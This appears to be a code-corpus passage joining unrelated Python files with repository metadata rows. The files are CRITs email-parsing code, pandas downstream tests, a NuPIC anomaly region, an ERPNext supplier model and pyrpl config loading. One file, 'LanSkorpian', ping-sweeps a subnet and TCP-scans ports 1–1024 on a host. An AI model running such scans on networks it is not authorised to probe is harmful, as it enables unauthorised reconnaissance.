{'relationship': relationship,
'relationships': results['message']},
RequestContext(request))
result = {'success': True, 'message': message}
else:
result = {
'success': False,
'message': "Error adding relationship: %s" % results['message']
}
else:
result = {
'success': False,
'message': "Error adding relationship: Could not find email/indicator",
}
return result
def create_email_attachment(email, cleaned_data, analyst, source, method="Upload",
reference="", campaign=None, confidence='low',
bucket_list=None, ticket=None, filedata=None,
filename=None, md5=None, email_addr=None, inherit_sources=False):
"""
Create an attachment for an email.
:param email: The email to use.
:type email: :class:`crits.emails.email.Email`
:param cleaned_data: Cleaned form information about the email.
:type cleaned_data: dict
:param analyst: The user creating this attachment.
:type analyst: str
:param source: The name of the source.
:type source: str
:param method: The method for this file upload.
:type method: str
:param reference: The source reference.
:type reference: str
:param campaign: The campaign to attribute to this attachment.
:type campaign: str
:param confidence: The campaign confidence.
:type confidence: str
:param bucket_list: The list of buckets to assign to this attachment.
:type bucket_list: str
:param ticket: The ticket to assign to this attachment.
:type ticket: str
:param filedata: The attachment.
:type filedata: request file data.
:param filename: The name of the file.
:type filename: str
:param md5: The MD5 of the file.
:type md5: str
:param email_addr: Email address to which to email the sample
:type email_addr: str
:param inherit_sources: 'True' if attachment should inherit Email's Source(s)
:type inherit_sources: bool
:returns: dict with keys "success" (boolean) and "message" (str).
"""
response = {'success': False,
'message': 'Unknown error; unable to upload file.'}
if filename:
filename = filename.strip()
# If selected, new sample inherits the campaigns of the related email.
if cleaned_data.get('inherit_campaigns'):
if campaign:
email.campaign.append(EmbeddedCampaign(name=campaign, confidence=confidence, analyst=analyst))
campaign = email.campaign
inherited_source = email.source if inherit_sources else None
try:
if filedata:
result = handle_uploaded_file(filedata,
source,
method,
reference,
cleaned_data['file_format'],
cleaned_data['password'],
analyst,
campaign,
confidence,
related_id=email.id,
related_type='Email',
filename=filename,
bucket_list=bucket_list,
ticket=ticket,
inherited_source=inherited_source)
else:
if md5:
md5 = md5.strip().lower()
result = handle_uploaded_file(None,
source,
method,
reference,
cleaned_data['file_format'],
None,
analyst,
campaign,
confidence,
related_id=email.id,
related_type='Email',
filename=filename,
md5=md5,
bucket_list=bucket_list,
ticket=ticket,
inherited_source=inherited_source,
is_return_only_md5=False)
except ZipFileError, zfe:
return {'success': False, 'message': zfe.value}
else:
if len(result) > 1:
response = {'success': True, 'message': 'Files uploaded successfully. '}
elif len(result) == 1:
if not filedata:
response['success'] = result[0].get('success', False)
if(response['success'] == False):
response['message'] = result[0].get('message', response.get('message'))
else:
result = [result[0].get('object').md5]
response['message'] = 'File uploaded successfully. '
else:
response = {'success': True, 'message': 'Files uploaded successfully. '}
if not response['success']:
return response
else:
if email_addr:
for s in result:
email_errmsg = mail_sample(s, [email_addr])
if email_errmsg is not None:
response['success'] = False
msg = "<br>Error emailing sample %s: %s\n" % (s, email_errmsg)
response['message'] = response['message'] + msg
return response
def parse_ole_file(file):
"""
Parse an OLE2.0 file to obtain data inside an email including attachments.
References:
http://www.fileformat.info/format/outlookmsg/
http://www.decalage.info/en/python/olefileio
https://code.google.com/p/pyflag/source/browse/src/FileFormats/OLE2.py
http://cpansearch.perl.org/src/MVZ/Email-Outlook-Message-0.912/lib/Email/Outlook/Message.pm
"""
header = file.read(len(olefile.MAGIC))
# Verify the file is in OLE2 format first
if header != olefile.MAGIC:
return {'error': 'The upload file is not a valid Outlook file. It must be in OLE2 format (.msg)'}
msg = {'subject': '_0037',
'body': '_1000',
'header': '_007D',
'message_class': '_001A',
'recipient_email': '_39FE',
'attachment_name': '_3707',
'attachment_data': '_3701',
'attachment_type': '_370E',
}
file.seek(0)
data = file.read()
msg_file = io.BytesIO(data)
ole = olefile.OleFileIO(msg_file)
# Helper function to grab data out of stream objects
def get_stream_data(entry):
stream = ole.openstream(entry)
data = stream.read()
stream.close()
return data
# Parse the OLE streams and get attachments, subject, body, headers, and class
# The email dict is what will be put into MongoDB for CRITs
attachments = {}
email = {}
    email['to'] = []
    # Default so the later smime checks do not fail when no class stream exists.
    message_class = ''
for entry in ole.listdir():
if 'attach' in entry[0]:
# Attachments are keyed by directory entry in the stream
# e.g. '__attach_version1.0_#00000000'
if entry[0] not in attachments:
attachments[entry[0]] = {}
if msg['attachment_name'] in entry[-1]:
attachments[entry[0]].update({'name': get_stream_data(entry).decode('utf-16')})
if msg['attachment_data'] in entry[-1]:
attachments[entry[0]].update({'data': get_stream_data(entry)})
if msg['attachment_type'] in entry[-1]:
attachments[entry[0]].update({'type': get_stream_data(entry).decode('utf-16')})
else:
if msg['subject'] in entry[-1]:
email['subject'] = get_stream_data(entry).decode('utf-16')
if msg['body'] in entry[-1]:
email['raw_body'] = get_stream_data(entry).decode('utf-16')
if msg['header'] in entry[-1]:
email['raw_header'] = get_stream_data(entry).decode('utf-16')
if msg['recipient_email'] in entry[-1]:
email['to'].append(get_stream_data(entry).decode('utf-16').lower())
if msg['message_class'] in entry[-1]:
message_class = get_stream_data(entry).decode('utf-16').lower()
ole.close()
# Process headers to extract data
headers = Parser().parse(io.StringIO(email.get('raw_header', '')), headersonly=True)
email['from_address'] = headers.get('From', '')
email['reply_to'] = headers.get('Reply-To', '')
email['date'] = headers.get('Date', '')
email['message_id'] = headers.get('Message-ID', '')
email['x_mailer'] = headers.get('X-Mailer', '')
email['x_originating_ip'] = headers.get('X-Originating-IP', '')
email['sender'] = getaddresses(headers.get_all('Sender', '')) # getaddresses returns list [(name, email)]
# If no sender, set the email address found in From:
if not email['sender']:
email['sender'] = getaddresses(headers.get_all('From', ''))
if len(email['sender']) > 0:
email['sender'] = email['sender'][0][1]
else:
email['sender'] = ''
# Get list of recipients and add to email['to'] if not already there
# Some emails do not have a stream for recipients (_39FE)
to = headers.get_all('To', [])
cc = headers.get_all('CC', [])
resent_to = headers.get_all('Resent-To', [])
resent_cc = headers.get_all('Resent-CC', [])
recipients = getaddresses(to + cc + resent_to + resent_cc)
for r in recipients:
addr = r[1].lower()
# If BCC then addr could be blank or set to undisclosed-recipients:
if addr and addr not in email['to'] and not re.match(r'^undisclosed-recipients[:;]?(?::;)?$', addr):
email['to'].append(addr)
# Check for encrypted and signed messages. The body will be empty in this case
# Message classes: http://msdn.microsoft.com/en-us/library/ee200767%28v=exchg.80%29.aspx
if message_class == 'ipm.note.smime' and not email.has_key('raw_body'):
email['raw_body'] = '<ENCRYPTED>'
if message_class == 'ipm.note.smime.multipartsigned' and not email.has_key('raw_body'):
email['raw_body'] = '<DIGITALLY SIGNED: body in smime.p7m>'
# Parse Received headers to get Helo and X-Originating-IP
# This can be unreliable since Received headers can be reordered by gateways
# and the date may not be in sync between systems. This is best effort based
# on the date as it appears in the Received header. In some cases there is no
# Received header present
#
# Received: from __ by __ with __ id __ for __ ; date
#
# See helper functions _get_received_from, _get_received_by, _get_received_date
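    # Hedged illustration (editor's addition): for a header such as
    #   Received: from mail.example.net (mail.example.net [203.0.113.7])
    #     by mx.victimdomain.com with ESMTP id abc123
    #     for <user@victimdomain.com>; Mon, 01 Jan 2001 00:00:00 -0500
    # _get_received_from() yields the "from ..." part (the helo candidate),
    # _get_received_by() the "by ... id ..." part, _get_received_for() the
    # recipient address, and the trailing date feeds the "earliest" comparisons.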
current_datetime = datetime.datetime.now()
earliest_helo_date = current_datetime
earliest_ip_date = current_datetime
email['helo'] = ''
originating_ip = ''
last_from = ''
helo_for = ''
all_received = headers.get_all('Received')
crits_config = CRITsConfig.objects().first()
if crits_config:
email_domain = get_valid_root_domain(crits_config.crits_email.split('@')[-1])[0]
else:
email_domain = ''
if all_received:
for received in all_received:
received_from = _get_received_from(received).lower() # from __
received_by = _get_received_by(received).lower() # by __ with __ id __
received_for = _get_received_for(received).lower() # for <email>
date = _get_received_date(received) # date
try:
current_date = datetime.datetime.fromtimestamp(mktime_tz(parsedate_tz(date))) # rfc2822 -> Time -> Datetime
except:
# Exception will occur if the date is not in the Received header. This could be
# where the originating IP is. e.g. Received: from 11.12.13.14 by rms-us019 with HTTP
current_date = datetime.datetime.min
grp = re.search(r'\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b', received_from)
if grp and not _is_reserved_ip(grp.group()) and ' localhost ' not in received_from:
if email_domain not in received_from and email_domain in received_by:
if(current_date < earliest_helo_date):
helo_for = parseaddr(received_for.strip())[1]
earliest_helo_date = current_date
email['helo'] = received_from
else:
last_from = received_from
if grp and not email['x_originating_ip'] and not _is_reserved_ip(grp.group()):
if current_date < earliest_ip_date:
earliest_ip_date = current_date
originating_ip = grp.group()
# If no proper Helo found, just use the last received_from without a reserved IP
if not email['helo']:
email['helo'] = last_from
# Set the extracted originating ip. If not found, then just use the IP from Helo
if not email['x_originating_ip']:
if originating_ip:
email['x_originating_ip'] = originating_ip
else:
grp = re.search(r'\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b', email['helo'])
if grp:
email['x_originating_ip'] = grp.group()
# Add the email address found in Helo
if helo_for and '@' in helo_for:
if helo_for not in email['to']:
email['to'].append(helo_for)
# If no Helo date found, then try to use the Date field
if earliest_helo_date == current_datetime and email['date']:
earliest_helo_date = datetime.datetime.fromtimestamp(mktime_tz(parsedate_tz(email['date'])))
return {'email': email, 'attachments': attachments.values(), 'received_date': earliest_helo_date}
def _get_received_from(received_header):
"""
Helper function to grab the 'from' part of a Received email header.
"""
received_header = received_header.replace('\r', '').replace('\n', '')
info = received_header.split('by ')
try:
return info[0]
except:
        return ''
def _get_received_by(received_header):
"""
Helper function to grab the 'by' part of a Received email header.
"""
received_header = received_header.replace('\r', '').replace('\n', '')
info = received_header.split('by ')
try:
return info[-1].split('for ')[0]
except:
return ''
def _get_received_for(received_header):
"""
Helper function to grab the 'for' part of a Received email header
WARNING: If 'for' is not there, the entire Received header is returned.
"""
received_header = received_header.replace('\r', '').replace('\n', '')
info = received_header.split('for ')
try:
return info[-1].split(';')[0]
except:
return ''
def _get_received_date(received_header):
"""
Helper function to grab the date part of a Received email header.
"""
received_header = received_header.replace('\r', '').replace('\n', '')
date = received_header.split(';')
try:
return date[-1]
except:
        return ''
def _is_reserved_ip(ip):
"""
Simple test to detect if an IP is private or loopback. Does not check
validity of the address.
"""
    grp = re.match(r'127\.\d{1,3}\.\d{1,3}\.\d{1,3}', ip) # 127.0.0.0/8
    if grp:
        return True
    grp = re.match(r'10\.\d{1,3}\.\d{1,3}\.\d{1,3}', ip) # 10.0.0.0/8
    if grp:
        return True
    grp = re.match(r'192\.168\.\d{1,3}\.\d{1,3}', ip) # 192.168.0.0/16
    if grp:
        return True
    grp = re.match(r'172\.(1[6-9]|2[0-9]|3[0-1])\.\d{1,3}\.\d{1,3}', ip) # 172.16.0.0/12
if grp:
return True
# No matches
return False
| mit | 7,987,814,643,264,909,000 | 37.396138 | 123 | 0.529283 | false |
cbertinato/pandas | pandas/tests/test_downstream.py | 1 | 4179 | """
Testing that we work in the downstream packages
"""
import importlib
import subprocess
import sys
import numpy as np # noqa
import pytest
from pandas.compat import PY36
from pandas import DataFrame
from pandas.util import testing as tm
def import_module(name):
# we *only* want to skip if the module is truly not available
# and NOT just an actual import error because of pandas changes
if PY36:
try:
return importlib.import_module(name)
except ModuleNotFoundError: # noqa
pytest.skip("skipping as {} not available".format(name))
else:
try:
return importlib.import_module(name)
except ImportError as e:
if "No module named" in str(e) and name in str(e):
pytest.skip("skipping as {} not available".format(name))
raise
@pytest.fixture
def df():
return DataFrame({'A': [1, 2, 3]})
def test_dask(df):
toolz = import_module('toolz') # noqa
dask = import_module('dask') # noqa
import dask.dataframe as dd
ddf = dd.from_pandas(df, npartitions=3)
assert ddf.A is not None
assert ddf.compute() is not None
def test_xarray(df):
xarray = import_module('xarray') # noqa
assert df.to_xarray() is not None
def test_oo_optimizable():
# GH 21071
subprocess.check_call([sys.executable, "-OO", "-c", "import pandas"])
@tm.network
# Cython import warning
@pytest.mark.filterwarnings("ignore:can't:ImportWarning")
def test_statsmodels():
statsmodels = import_module('statsmodels') # noqa
import statsmodels.api as sm
import statsmodels.formula.api as smf
df = sm.datasets.get_rdataset("Guerry", "HistData").data
smf.ols('Lottery ~ Literacy + np.log(Pop1831)', data=df).fit()
# Cython import warning
@pytest.mark.filterwarnings("ignore:can't:ImportWarning")
def test_scikit_learn(df):
sklearn = import_module('sklearn') # noqa
from sklearn import svm, datasets
digits = datasets.load_digits()
clf = svm.SVC(gamma=0.001, C=100.)
clf.fit(digits.data[:-1], digits.target[:-1])
clf.predict(digits.data[-1:])
# Cython import warning and traitlets
@tm.network
@pytest.mark.filterwarnings("ignore")
def test_seaborn():
seaborn = import_module('seaborn')
tips = seaborn.load_dataset("tips")
seaborn.stripplot(x="day", y="total_bill", data=tips)
def test_pandas_gbq(df):
pandas_gbq = import_module('pandas_gbq') # noqa
@pytest.mark.xfail(reason="0.7.0 pending")
@tm.network
def test_pandas_datareader():
pandas_datareader = import_module('pandas_datareader') # noqa
pandas_datareader.DataReader(
'F', 'quandl', '2017-01-01', '2017-02-01')
# importing from pandas, Cython import warning
@pytest.mark.filterwarnings("ignore:The 'warn':DeprecationWarning")
@pytest.mark.filterwarnings("ignore:pandas.util:DeprecationWarning")
@pytest.mark.filterwarnings("ignore:can't resolve:ImportWarning")
@pytest.mark.skip(reason="gh-25778: geopandas stack issue")
def test_geopandas():
geopandas = import_module('geopandas') # noqa
fp = geopandas.datasets.get_path('naturalearth_lowres')
assert geopandas.read_file(fp) is not None
# Cython import warning
@pytest.mark.filterwarnings("ignore:can't resolve:ImportWarning")
def test_pyarrow(df):
pyarrow = import_module('pyarrow') # noqa
table = pyarrow.Table.from_pandas(df)
result = table.to_pandas()
tm.assert_frame_equal(result, df)
@pytest.mark.xfail(reason="pandas-wheels-50", strict=False)
def test_missing_required_dependency():
# GH 23868
# To ensure proper isolation, we pass these flags
# -S : disable site-packages
# -s : disable user site-packages
# -E : disable PYTHON* env vars, especially PYTHONPATH
# And, that's apparently not enough, so we give up.
# https://github.com/MacPython/pandas-wheels/pull/50
call = ['python', '-sSE', '-c', 'import pandas']
with pytest.raises(subprocess.CalledProcessError) as exc:
subprocess.check_output(call, stderr=subprocess.STDOUT)
output = exc.value.stdout.decode()
for name in ['numpy', 'pytz', 'dateutil']:
assert name in output
| bsd-3-clause | -6,467,225,624,213,887,000 | 26.493421 | 73 | 0.680785 | false |
tomsilver/nupic | nupic/regions/AnomalyRegion.py | 1 | 2946 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2015, Numenta, Inc. Unless you have purchased from
# Numenta, Inc. a separate commercial license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""Region for computing the anomaly score."""
import numpy
from nupic.algorithms import anomaly
from nupic.regions.PyRegion import PyRegion
class AnomalyRegion(PyRegion):
"""Region for computing the anomaly score."""
@classmethod
def getSpec(cls):
return {
"description": ("Region that computes anomaly scores from temporal "
"memory."),
"singleNodeOnly": True,
"inputs": {
"activeColumns": {
"description": "The currently active columns.",
"regionLevel": True,
"dataType": "Real32",
"count": 0,
"required": True,
"isDefaultInput": False,
"requireSplitterMap": False,
},
"predictedColumns": {
"description": "The currently predicted columns.",
"regionLevel": True,
"dataType": "Real32",
"count": 0,
"required": True,
"isDefaultInput": False,
"requireSplitterMap": False,
},
},
"outputs": {
"rawAnomalyScore": {
"description": "The raw anomaly score.",
"dataType": "Real32",
"count": 1,
"regionLevel": True,
"isDefaultOutput": True,
},
},
"parameters": {
},
"commands": {
},
}
def __init__(self, *args, **kwargs):
self.prevPredictedColumns = numpy.zeros([], dtype="float32")
def initialize(self, inputs, outputs):
pass
def compute(self, inputs, outputs):
activeColumns = inputs["activeColumns"].nonzero()[0]
rawAnomalyScore = anomaly.computeRawAnomalyScore(
activeColumns, self.prevPredictedColumns)
self.prevPredictedColumns = inputs["predictedColumns"].nonzero()[0]
outputs["rawAnomalyScore"][0] = rawAnomalyScore
| gpl-3.0 | 5,956,932,422,393,378,000 | 30.677419 | 76 | 0.569246 | false |
rrice2004/LanSkorpian | LanSkorpian.py | 1 | 3034 | ## LANSKORPIAN - Personal home network scanner
## Copyright (C) Robert Rice <[email protected]>
## This program is published under a MIT license
print "\n"
print ("-" * 60)
print " LANSKORPIAN Personal Home Port Scanner"
print ("-" * 60)
print "\n"
# Import modules
import subprocess
import ipaddress
from datetime import datetime
import socket
import sys
from com_ports import*
# input a network address
net_addr = raw_input("Enter a network address in CIDR format(ex.192.168.1.0/24): ")
start_time = datetime.now()
# Banner
print ("-" * 60)
print "Please wait, scanning network", net_addr
print ("-" * 60)
# Create the network
ip_net = ipaddress.ip_network(net_addr)
# Get all hosts on that network
all_hosts = list(ip_net.hosts())
# Configure subprocess to hide the console window
info = subprocess.STARTUPINFO()
info.dwFlags |= subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = subprocess.SW_HIDE
# For each IP address in the subnet,
# run the ping command with subprocess.popen interface
for i in range(len(all_hosts)):
    output = subprocess.Popen(['ping', '-n', '1', '-w', '100', str(all_hosts[i])], stdout=subprocess.PIPE, startupinfo=info).communicate()[0]
if "Destination host unreachable" in output.decode('utf-8'):
pass
elif "Request timed out" in output.decode('utf-8'):
pass
else:
print(str(all_hosts[i]) + " is Active")
stop_time = datetime.now()
total = stop_time - start_time
print 'Scanning Completed in: ', total
print "\n"
####################################################################
# Start individual host scan
remoteServer = raw_input("Enter Active host to scan: ")
remoteServerIP = socket.gethostbyname(remoteServer)
name = socket.getfqdn(remoteServerIP)
# Banner
print ("-" * 60)
print "Please wait, scanning Active host", name
print ("-" * 60)
# Check what time the scan started
t1 = datetime.now()
# check and returns the service name if available
def get_service(port):
port = str(port)
if port in common_ports:
return common_ports[port]
else:
return unknown_ports
#start scanning ports
try:
for port in range(1,1025):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((remoteServerIP, port))
if result == 0:
print "Port {}: Open".format(port), get_service(port)
sock.close()
except KeyboardInterrupt:
t2 = datetime.now()
cancel = t2 - t1
    print "Scan cancelled by user in:", cancel
sys.exit()
except socket.gaierror:
print 'Hostname could not be resolved. Exiting'
sys.exit()
except socket.error:
print "Couldn't connect to server"
sys.exit()
# Checking the time again
t3 = datetime.now()
# Calculates the difference of time, to see how long it took to run the script
total = t3 - t1
# Printing the information to screen
print 'Scanning Completed in: ', total
| mit | 7,584,437,968,339,130,000 | 24.155172 | 143 | 0.644693 | false |
shitolepriya/Saloon_erp | erpnext/buying/doctype/supplier/supplier.py | 1 | 4173 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
import frappe.defaults
from frappe import msgprint, _
from frappe.model.naming import make_autoname
from erpnext.utilities.address_and_contact import load_address_and_contact
from erpnext.utilities.transaction_base import TransactionBase
from erpnext.accounts.party import validate_party_accounts
class Supplier(TransactionBase):
def get_feed(self):
return self.supplier_name
def onload(self):
"""Load address and contacts in `__onload`"""
load_address_and_contact(self, "supplier")
def autoname(self):
supp_master_name = frappe.defaults.get_global_default('supp_master_name')
if supp_master_name == 'Supplier Name':
self.name = self.supplier_name
# self.name = self.supplier_name + '-' + self.company
else:
self.name = make_autoname(self.naming_series + '.#####')
# self.name = make_autoname(self.company + '-' + self.naming_series + '.#####')
def update_address(self):
frappe.db.sql("""update `tabAddress` set supplier_name=%s, modified=NOW()
where supplier=%s""", (self.supplier_name, self.name))
def update_contact(self):
frappe.db.sql("""update `tabContact` set supplier_name=%s, modified=NOW()
where supplier=%s""", (self.supplier_name, self.name))
def on_update(self):
if not self.naming_series:
self.naming_series = ''
self.update_address()
self.update_contact()
def validate(self):
#validation for Naming Series mandatory field...
if frappe.defaults.get_global_default('supp_master_name') == 'Naming Series':
if not self.naming_series:
msgprint(_("Series is mandatory"), raise_exception=1)
validate_party_accounts(self)
def get_contacts(self,nm):
if nm:
contact_details =frappe.db.convert_to_lists(frappe.db.sql("select name, CONCAT(IFNULL(first_name,''),' ',IFNULL(last_name,'')),contact_no,email_id from `tabContact` where supplier = %s", nm))
return contact_details
else:
return ''
def delete_supplier_address(self):
for rec in frappe.db.sql("select * from `tabAddress` where supplier=%s", (self.name,), as_dict=1):
frappe.db.sql("delete from `tabAddress` where name=%s",(rec['name']))
def delete_supplier_contact(self):
for contact in frappe.db.sql_list("""select name from `tabContact`
where supplier=%s""", self.name):
frappe.delete_doc("Contact", contact)
def on_trash(self):
self.delete_supplier_address()
self.delete_supplier_contact()
def after_rename(self, olddn, newdn, merge=False):
set_field = ''
if frappe.defaults.get_global_default('supp_master_name') == 'Supplier Name':
frappe.db.set(self, "supplier_name", newdn)
self.update_contact()
set_field = ", supplier_name=%(newdn)s"
self.update_supplier_address(newdn, set_field)
def update_supplier_address(self, newdn, set_field):
frappe.db.sql("""update `tabAddress` set address_title=%(newdn)s
{set_field} where supplier=%(newdn)s"""\
.format(set_field=set_field), ({"newdn": newdn}))
@frappe.whitelist()
def get_dashboard_info(supplier):
if not frappe.has_permission("Supplier", "read", supplier):
frappe.throw(_("No permission"))
out = {}
for doctype in ["Supplier Quotation", "Purchase Order", "Purchase Receipt", "Purchase Invoice"]:
out[doctype] = frappe.db.get_value(doctype,
{"supplier": supplier, "docstatus": ["!=", 2] }, "count(*)")
billing_this_year = frappe.db.sql("""
select sum(ifnull(credit_in_account_currency, 0)) - sum(ifnull(debit_in_account_currency, 0))
from `tabGL Entry`
where voucher_type='Purchase Invoice' and party_type = 'Supplier'
and party=%s and fiscal_year = %s""",
(supplier, frappe.db.get_default("fiscal_year")))
total_unpaid = frappe.db.sql("""select sum(outstanding_amount)
from `tabPurchase Invoice`
where supplier=%s and docstatus = 1""", supplier)
out["billing_this_year"] = billing_this_year[0][0] if billing_this_year else 0
out["total_unpaid"] = total_unpaid[0][0] if total_unpaid else 0
out["company_currency"] = frappe.db.sql_list("select distinct default_currency from tabCompany")
return out
| agpl-3.0 | -6,728,424,563,410,634,000 | 35.929204 | 194 | 0.705967 | false |
kublaj/the-maker | sandboxProjectConvert_spec.py | 1 | 4768 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import unittest
import os
import shutil
from makerUpdateSandboxedProjects import UpdateSandboxedProjects as theUpdater
import makerUpdateSandboxedProjects
import sys
from makerUtilities import writeDataToFile, readDataFromFile
import wx
class MakerTest(unittest.TestCase):
def tearMeDown(self):
if os.path.isdir(self.targetDir):
shutil.rmtree(self.targetDir, ignore_errors = True)
def setMeUp(self):
self.user_home = "/Users/maker/"
testProjects = os.path.join(os.getcwd(),"_Testing_")
self.tool = theUpdater()
self.targetDir = self.tool.getConversionTargetDir()
self.sandbox = self.tool.getApplicationSupportDir()
self.oldProjectsDir = os.path.join(self.sandbox, "makerProjects")
self.UIData = {'SplitterSashPosition': 200,
'editorStyle': 'Github',
'sessionFiles': [[u'index_en', '.content', u'Test.makerProject', 0, 'False'],
[u'bootstrap-alert', '.js', u'Test.makerProject', 0, 'False'],
[u'bootstrap-collapse', '.js', u'Test.makerProject', 97, 'True']],
'linkedProjects': [u'/Users/maker/Desktop/Test.makerProject'],
'Position': wx.Point(120, 36), 'Size': wx.Size(1200, 796)}
if os.path.isdir(self.sandbox):
shutil.rmtree(self.sandbox, ignore_errors = True)
shutil.copytree(testProjects, self.oldProjectsDir)
writeDataToFile(self.UIData, os.path.join(self.sandbox,".makerUISettings"))
def test_getCorrectTargetDir(self):
self.setMeUp()
self.assertTrue(self.targetDir.endswith(makerUpdateSandboxedProjects.TARGET_NAME), "Target dir set correct")
self.tearMeDown()
def test_ifNoMakerProjectsDirInSandboxDoNothing(self):
self.setMeUp()
if os.path.isdir(self.oldProjectsDir):
shutil.rmtree(self.oldProjectsDir)
self.tool.update()
self.assertFalse(os.path.isdir(self.targetDir), "There should be no target dir")
self.tearMeDown()
def test_ifNoProjectsInSandboxDoNothing(self):
self.setMeUp()
if os.path.isdir(self.oldProjectsDir):
shutil.rmtree(self.oldProjectsDir)
print "creating empty projects dir"
os.mkdir(os.path.join(self.sandbox, "makerProjects"))
self.assertTrue(os.path.isdir(os.path.join(self.sandbox, "makerProjects")), "Project dir is there...")
self.assertEqual(os.listdir(self.oldProjectsDir), [], "It is empty...")
self.tool.update()
self.assertFalse(os.path.isdir(self.targetDir), "There should be no target dir")
self.tearMeDown()
def test_existingProjectsWillBeConverted(self):
def isProject(project):
if os.path.isdir(os.path.join(project, "parts")):
return True
else:
return False
def getProjectsInSandbox():
projects = []
for item in os.listdir(self.oldProjectsDir):
if not item.startswith(".") and isProject(os.path.join(self.oldProjectsDir, item)):
projects.append(item)
return projects
self.setMeUp()
self.assertNotEqual(os.listdir(self.oldProjectsDir), [], "It is empty...")
print "creating JUNK project..."
junk = "IamNotAProject"
spam = os.path.join(self.oldProjectsDir, junk)
os.mkdir(spam)
self.assertTrue(os.path.isdir(spam), "Junk project is there...")
oldProjects = getProjectsInSandbox()
self.assertTrue("TestProjectOne" in oldProjects, "Old project in list")
self.tool.update()
self.assertTrue(os.path.isdir(self.targetDir), "There should be no target dir")
self.assertFalse(os.path.isdir(self.oldProjectsDir), "There should be no old project dir")
fileInTarget = os.listdir(self.targetDir)
for item in oldProjects:
self.assertTrue(item + ".makerProject" in fileInTarget, "project has been converted and copied")
self.assertFalse(junk + ".makerProject" in fileInTarget, "JUNK project has NOT been converted and copied")
self.tearMeDown()
if __name__=="__main__":
unittest.main()
| gpl-3.0 | -763,920,841,446,810,000 | 31.216216 | 116 | 0.575503 | false |
lneuhaus/pyrpl | pyrpl/memory.py | 1 | 26126 | ###############################################################################
# pyrpl - DSP servo controller for quantum optics with the RedPitaya
# Copyright (C) 2014-2016 Leonhard Neuhaus ([email protected])
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
###############################################################################
import os
from collections import OrderedDict
from shutil import copyfile
import numpy as np
import time
from qtpy import QtCore
from . import default_config_dir, user_config_dir
from .pyrpl_utils import time
import logging
logger = logging.getLogger(name=__name__)
class UnexpectedSaveError(RuntimeError):
pass
# the config file is read through a yaml interface. The preferred one is
# ruamel.yaml, since it allows to preserve comments and whitespace in the
# config file through roundtrips (the config file is rewritten every time a
# parameter is changed). If ruamel.yaml is not installed, the program will
# issue a warning and use pyyaml (=yaml= instead). Comments are lost in this
# case.
try:
raise # disables ruamel support
import ruamel.yaml
#ruamel.yaml.add_implicit_resolver()
ruamel.yaml.RoundTripDumper.add_representer(np.float64,
lambda dumper, data: dumper.represent_float(float(data)))
ruamel.yaml.RoundTripDumper.add_representer(complex,
lambda dumper, data: dumper.represent_str(str(data)))
ruamel.yaml.RoundTripDumper.add_representer(np.complex128,
lambda dumper, data: dumper.represent_str(str(data)))
ruamel.yaml.RoundTripDumper.add_representer(np.ndarray,
lambda dumper, data: dumper.represent_list(list(data)))
#http://stackoverflow.com/questions/13518819/avoid-references-in-pyyaml
#ruamel.yaml.RoundTripDumper.ignore_aliases = lambda *args: True
def load(f):
return ruamel.yaml.load(f, ruamel.yaml.RoundTripLoader)
def save(data, stream=None):
return ruamel.yaml.dump(data, stream=stream,
Dumper=ruamel.yaml.RoundTripDumper,
default_flow_style=False)
except:
logger.debug("ruamel.yaml could not be imported. Using yaml instead. "
"Comments in config files will be lost.")
import yaml
# see http://stackoverflow.com/questions/13518819/avoid-references-in-pyyaml
#yaml.Dumper.ignore_aliases = lambda *args: True # NEVER TESTED
# ordered load and dump for yaml files. From
# http://stackoverflow.com/questions/5121931/in-python-how-can-you-load-yaml-mappings-as-ordereddicts
def load(stream, Loader=yaml.SafeLoader, object_pairs_hook=OrderedDict):
class OrderedLoader(Loader):
pass
def construct_mapping(loader, node):
loader.flatten_mapping(node)
return object_pairs_hook(loader.construct_pairs(node))
OrderedLoader.add_constructor(
yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG,
construct_mapping)
return yaml.load(stream, OrderedLoader)
def save(data, stream=None, Dumper=yaml.SafeDumper,
default_flow_style=False,
encoding='utf-8',
**kwds):
class OrderedDumper(Dumper):
pass
def _dict_representer(dumper, data):
return dumper.represent_mapping(
yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG,
data.items())
OrderedDumper.add_representer(OrderedDict, _dict_representer)
OrderedDumper.add_representer(np.float64,
lambda dumper, data: dumper.represent_float(float(data)))
OrderedDumper.add_representer(complex,
lambda dumper, data: dumper.represent_str(str(data)))
OrderedDumper.add_representer(np.complex128,
lambda dumper, data: dumper.represent_str(str(data)))
OrderedDumper.add_representer(np.ndarray,
lambda dumper, data: dumper.represent_list(list(data)))
# I added the following two lines to make pyrpl compatible with pyinstruments. In principle they can be erased
if isinstance(data, dict) and not isinstance(data, OrderedDict):
data = OrderedDict(data)
return yaml.dump(data,
stream=stream,
Dumper=OrderedDumper,
default_flow_style=default_flow_style,
encoding=encoding,
**kwds)
# usage example:
# load(stream, yaml.SafeLoader)
# save(data, stream=f, Dumper=yaml.SafeDumper)
def isbranch(obj):
return isinstance(obj, dict) or isinstance(obj, list)
# two functions to locate config files
def _get_filename(filename=None):
""" finds the correct path and name of a config file """
